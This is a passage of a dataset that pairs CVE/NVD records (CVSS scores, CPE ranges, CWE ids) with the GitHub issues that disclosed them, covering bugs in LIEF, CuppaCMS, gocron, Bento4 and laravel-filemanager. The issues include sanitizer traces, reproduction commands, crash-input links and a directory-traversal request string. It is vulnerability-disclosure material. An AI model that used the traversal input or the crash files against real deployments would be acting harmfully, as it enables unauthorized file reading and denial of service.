"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/lief-project/LIEF/issues/766"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/lief-project/LIEF/issues/766"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:lief-project:lief:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B2A9F55D-96B8-4830-A6DB-5D04F75406E4",
"versionEndExcluding": null,
"versionEndIncluding": "0.12.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/lief-project/LIEF/issues/766 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"lief-project",
"LIEF"
] | ###### version
```
latest master 365a16a
```
###### Build platform
Ubuntu 20.04.3 LTS (Linux 5.13.0-52-generic x86_64)
###### Build step
```
cmake -DLIEF_ASAN=ON ../
```
###### Run
```
./build/examples/c/elf_reader poc
```
[poc.zip](https://github.com/lief-project/LIEF/files/9299058/poc.zip)
###### Output
```
Can't access the content of section #0
Can't parse section #01
Binary doesn't have a program header
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3230843==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x559aec0a79de bp 0x0fffef333808 sp 0x7fff7999c000 T0)
==3230843==The signal is caused by a WRITE memory access.
==3230843==Hint: address points to the zero page.
#0 0x559aec0a79dd in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_length(unsigned long) /usr/include/c++/9/bits/basic_string.h:187
#1 0x559aec0a79dd in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_set_length(unsigned long) /usr/include/c++/9/bits/basic_string.h:220
#2 0x559aec0a79dd in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator=(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&&) /usr/include/c++/9/bits/basic_string.h:756
#3 0x559aec0a79dd in void LIEF::ELF::CoreFile::parse_<LIEF::ELF::details::ELF32>() /home/wcc/LIEF/src/ELF/NoteDetails/core/CoreFile.tcc:69
#4 0x559aec09aa70 in LIEF::ELF::CoreFile::parse() /home/wcc/LIEF/src/ELF/NoteDetails/core/CoreFile.cpp:114
#5 0x559aec09aa8d in LIEF::ELF::CoreFile::make(LIEF::ELF::Note&) /home/wcc/LIEF/src/ELF/NoteDetails/core/CoreFile.cpp:38
#6 0x559aebfdeb66 in LIEF::ELF::Note::details() /home/wcc/LIEF/src/ELF/Note.cpp:156
#7 0x559aebfe14ee in LIEF::ELF::Note::Note(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, LIEF::ELF::NOTE_TYPES_CORE, std::vector<unsigned char, std::allocator<unsigned char> > const&, LIEF::ELF::Binary*) /home/wcc/LIEF/src/ELF/Note.cpp:92
#8 0x559aebf183ac in std::_MakeUniq<LIEF::ELF::Note>::__single_object std::make_unique<LIEF::ELF::Note, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, LIEF::ELF::NOTE_TYPES_CORE, std::vector<unsigned char, std::allocator<unsigned char> >, LIEF::ELF::Binary*>(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, LIEF::ELF::NOTE_TYPES_CORE&&, std::vector<unsigned char, std::allocator<unsigned char> >&&, LIEF::ELF::Binary*&&) /usr/include/c++/9/bits/unique_ptr.h:857
#9 0x559aebf183ac in LIEF::ELF::Parser::parse_notes(unsigned long, unsigned long) /home/wcc/LIEF/src/ELF/Parser.cpp:568
#10 0x559aebf8c11c in boost::leaf::result<LIEF::ok_t> LIEF::ELF::Parser::parse_binary<LIEF::ELF::details::ELF32>() /home/wcc/LIEF/src/ELF/Parser.tcc:296
#11 0x559aebf1bad5 in LIEF::ELF::Parser::init(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/wcc/LIEF/src/ELF/Parser.cpp:323
#12 0x559aebf1bf8d in LIEF::ELF::Parser::parse(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, LIEF::ELF::DYNSYM_COUNT_METHODS) /home/wcc/LIEF/src/ELF/Parser.cpp:342
#13 0x559aebc1f3ae in elf_parse /home/wcc/LIEF/api/c/ELF/Binary.cpp:67
#14 0x559aebc1ce4f in main /home/wcc/LIEF/examples/c/elf_reader.c:16
#15 0x7f49b9b990b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
#16 0x559aebc1cc3d in _start (/home/wcc/LIEF/build/examples/c/elf_reader+0x281c3d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /usr/include/c++/9/bits/basic_string.h:187 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_length(unsigned long)
==3230843==ABORTING
``` | SEGV in CoreFile.tcc:69 | https://api.github.com/repos/lief-project/LIEF/issues/766/comments | 0 | 2022-08-10T10:09:19Z | 2022-08-13T05:00:37Z | https://github.com/lief-project/LIEF/issues/766 | 1,334,389,058 | 766 | 4,137 |
CVE-2022-37191 | 2022-09-13T23:15:08.667 | The component "cuppa/api/index.php" of CuppaCMS v1.0 is Vulnerable to LFI. An authenticated user can read system files via crafted POST request using [function] parameter value as LFI payload. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/CuppaCMS/CuppaCMS/issues/20"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/badru8612/CuppaCMS-Authenticated-LFI-Vulnerability"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/CuppaCMS/CuppaCMS/issues/20"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/badru8612/CuppaCMS-Authenticated-LFI-Vulnerability"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"829"
] | 829 | https://github.com/CuppaCMS/CuppaCMS/issues/20 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"CuppaCMS",
"CuppaCMS"
] | There is a serious Local File Inclusion vulnerability exists in **"cuppa/api/index.php"** via **POST** requests "**function**" parameter.
**PoC:**

Reference: https://github.com/badru8612/CuppaCMS-Authenticated-LFI-Vulnerability | Authenticated Local File Inclusion vulnerability in cuppa api. | https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/20/comments | 0 | 2022-01-24T07:59:02Z | 2022-01-25T23:08:06Z | https://github.com/CuppaCMS/CuppaCMS/issues/20 | 1,112,291,001 | 20 | 4,138 |
CVE-2022-40365 | 2022-09-14T21:15:10.583 | Cross site scripting (XSS) vulnerability in ouqiang gocron through 1.5.3, allows attackers to execute arbitrary code via scope.row.hostname in web/vue/src/pages/taskLog/list.vue. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/ouqiang/gocron"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ouqiang/gocron/issues/362"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/ouqiang/gocron"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ouqiang/gocron/issues/362"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gocron_project:gocron:*:*:*:*:*:*:*:*",
"matchCriteriaId": "556143D0-A8C7-4901-80C8-1F0FDA88554C",
"versionEndExcluding": null,
"versionEndIncluding": "1.5.3",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/ouqiang/gocron/issues/362 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ouqiang",
"gocron"
] | ### Introduction
> `gocron/web/vue/src/pages/taskLog/list.vue` line 91 host will be parsed by the browser as html, which leads to xss vulnerability
### Proof

<img width="1776" alt="image" src="https://user-images.githubusercontent.com/51900604/183247054-868c1c22-7319-4a26-8149-406995816db4.png">
| There is an xss vulnerability in the front end | https://api.github.com/repos/ouqiang/gocron/issues/362/comments | 0 | 2022-08-06T11:30:51Z | 2022-08-06T11:30:51Z | https://github.com/ouqiang/gocron/issues/362 | 1,330,728,479 | 362 | 4,139 |
CVE-2022-40438 | 2022-09-14T21:15:10.627 | Buffer overflow vulnerability in function AP4_MemoryByteStream::WritePartial in mp42aac in Bento4 v1.6.0-639, allows attackers to cause a denial of service via a crafted file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/751"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/751"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*",
"matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/axiomatic-systems/Bento4/issues/751 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | Hi, developers of Bento4:
In the test of the binary mp42aac instrumented with ASAN. There are some inputs causing heap-buffer-overflow. Here is the ASAN mode output:
=================================================================
==4695==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6190000027a0 at pc 0x7ffff6ef6964 bp 0x7fffffffdea0 sp 0x7fffffffd648
WRITE of size 4294967288 at 0x6190000027a0 thread T0
#0 0x7ffff6ef6963 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c963)
#1 0x409ed4 in AP4_MemoryByteStream::WritePartial(void const*, unsigned int, unsigned int&) /home/ferry/dp/Bento4/Source/C++/Core/Ap4ByteStream.cpp:785
#2 0x40d9e3 in AP4_ByteStream::Write(void const*, unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4ByteStream.cpp:77
#3 0x4eb601 in AP4_Atom::Write(AP4_ByteStream&) /home/ferry/dp/Bento4/Source/C++/Core/Ap4Atom.cpp:229
#4 0x4eb601 in AP4_Atom::Clone() /home/ferry/dp/Bento4/Source/C++/Core/Ap4Atom.cpp:316
#5 0x446d7a in AP4_SampleDescription::AP4_SampleDescription(AP4_SampleDescription::Type, unsigned int, AP4_AtomParent*) /home/ferry/dp/Bento4/Source/C++/Core/Ap4SampleDescription.cpp:138
#6 0x461a8f in AP4_GenericAudioSampleDescription::AP4_GenericAudioSampleDescription(unsigned int, unsigned int, unsigned short, unsigned short, AP4_AtomParent*) /home/ferry/dp/Bento4/Source/C++/Core/Ap4SampleDescription.h:259
#7 0x461a8f in AP4_AudioSampleEntry::ToSampleDescription() /home/ferry/dp/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:630
#8 0x48ca03 in AP4_StsdAtom::GetSampleDescription(unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:181
#9 0x4040b6 in main /home/ferry/dp/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:268
#10 0x7ffff61bb83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#11 0x408338 in _start (/home/ferry/dp/Bento4/mp42aac+0x408338)
0x6190000027a0 is located 0 bytes to the right of 1056-byte region [0x619000002380,0x6190000027a0)
allocated by thread T0 here:
#0 0x7ffff6f03712 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99712)
#1 0x414c8e in AP4_DataBuffer::ReallocateBuffer(unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210
#2 0x414c8e in AP4_DataBuffer::SetBufferSize(unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:136
#3 0x414c8e in AP4_DataBuffer::Reserve(unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:107
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy
Shadow bytes around the buggy address:
0x0c327fff84a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff84b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff84c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff84d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff84e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c327fff84f0: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8530: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==4695==ABORTING
### Crash input
https://github.com/17ssDP/fuzzer_crashes/blob/main/Bento4/input2
### Validation steps
```
git clone https://github.com/axiomatic-systems/Bento4
cd Bento4/
mkdir check_build && cd check_build
cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release
make -j
./mp42aac input2 /dev/null
```
### Environment
Ubuntu 16.04
Clang 10.0.1
gcc 5.5
| Heap-buffer-overflow with ASAN in mp42aac | https://api.github.com/repos/axiomatic-systems/Bento4/issues/751/comments | 0 | 2022-09-07T02:21:29Z | 2022-09-18T23:10:27Z | https://github.com/axiomatic-systems/Bento4/issues/751 | 1,364,000,633 | 751 | 4,140 |
CVE-2022-40439 | 2022-09-14T21:15:10.670 | An memory leak issue was discovered in AP4_StdcFileByteStream::Create in mp42ts in Bento4 v1.6.0-639, allows attackers to cause a denial of service via a crafted file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/750"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/750"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*",
"matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"401"
] | 401 | https://github.com/axiomatic-systems/Bento4/issues/750 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | Hi, developers of Bento4:
In the test of the binary mp42ts instrumented with ASAN. There are some inputs causing memory leaks. Here is the ASAN mode output:
=================================================================
==18321==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 48 byte(s) in 1 object(s) allocated from:
#0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592)
#1 0x4c871d in AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:279
#2 0x4c871d in AP4_FileByteStream::Create(char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:439
Indirect leak of 72 byte(s) in 1 object(s) allocated from:
#0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592)
#1 0x404286 in main /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:511
#2 0x7ffff61bb83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592)
#1 0x4f57d1 in AP4_RtpAtom::Create(unsigned int, AP4_ByteStream&) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Core/Ap4RtpAtom.h:53
#2 0x4f57d1 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:689
Indirect leak of 24 byte(s) in 1 object(s) allocated from:
#0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592)
#1 0x4d2591 in AP4_List<AP4_Atom>::Add(AP4_Atom*) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Core/Ap4List.h:160
#2 0x4d2591 in AP4_AtomParent::AddChild(AP4_Atom*, int) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Core/Ap4Atom.cpp:532
SUMMARY: AddressSanitizer: 208 byte(s) leaked in 4 allocation(s).
### **Crash Input**
https://github.com/17ssDP/fuzzer_crashes/blob/main/Bento4/input1
### Verification steps:
```
git clone https://github.com/axiomatic-systems/Bento4
cd Bento4/
mkdir check_build && cd check_build
cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release
make -j
./mp42ts input1 /dev/null
```
### Environment
Ubuntu 16.04
Clang 10.0.1
gcc 5.5
| Memory leaks with ASAN in mp42ts | https://api.github.com/repos/axiomatic-systems/Bento4/issues/750/comments | 0 | 2022-09-06T14:00:13Z | 2023-05-29T02:53:17Z | https://github.com/axiomatic-systems/Bento4/issues/750 | 1,363,336,565 | 750 | 4,141 |
CVE-2022-40734 | 2022-09-14T23:15:09.583 | UniSharp laravel-filemanager (aka Laravel Filemanager) before 2.6.4 allows download?working_dir=%2F.. directory traversal to read arbitrary files, as exploited in the wild in June 2022. This is related to league/flysystem before 2.0.0. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1150"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1150"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F55D5755-7EE5-4205-A976-12D1DBAB33B0",
"versionEndExcluding": null,
"versionEndIncluding": "2.5.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/UniSharp/laravel-filemanager/issues/1150 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"UniSharp",
"laravel-filemanager"
] | I do not use this package, but I seen this in our firewall blocked list. My guess is that there is some sort of vulnerability.

| Directory traversal vulnerability (CVE-2022-40734) | https://api.github.com/repos/UniSharp/laravel-filemanager/issues/1150/comments | 19 | 2022-06-22T04:18:30Z | 2024-03-28T15:31:00Z | https://github.com/UniSharp/laravel-filemanager/issues/1150 | 1,279,489,454 | 1,150 | 4,142 |
CVE-2022-40734 | 2022-09-14T23:15:09.583 | UniSharp laravel-filemanager (aka Laravel Filemanager) before 2.6.4 allows download?working_dir=%2F.. directory traversal to read arbitrary files, as exploited in the wild in June 2022. This is related to league/flysystem before 2.0.0. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1150"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1150"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F55D5755-7EE5-4205-A976-12D1DBAB33B0",
"versionEndExcluding": null,
"versionEndIncluding": "2.5.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966 | null | github.com | [
"UniSharp",
"laravel-filemanager"
] | I do not use this package, but I seen this in our firewall blocked list. My guess is that there is some sort of vulnerability.

| Directory traversal vulnerability (CVE-2022-40734) | https://api.github.com/repos/UniSharp/laravel-filemanager/issues/1150/comments | 19 | 2022-06-22T04:18:30Z | 2024-03-28T15:31:00Z | https://github.com/UniSharp/laravel-filemanager/issues/1150 | 1,279,489,454 | 1,150 | 4,143 |
CVE-2022-40734 | 2022-09-14T23:15:09.583 | UniSharp laravel-filemanager (aka Laravel Filemanager) before 2.6.4 allows download?working_dir=%2F.. directory traversal to read arbitrary files, as exploited in the wild in June 2022. This is related to league/flysystem before 2.0.0. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
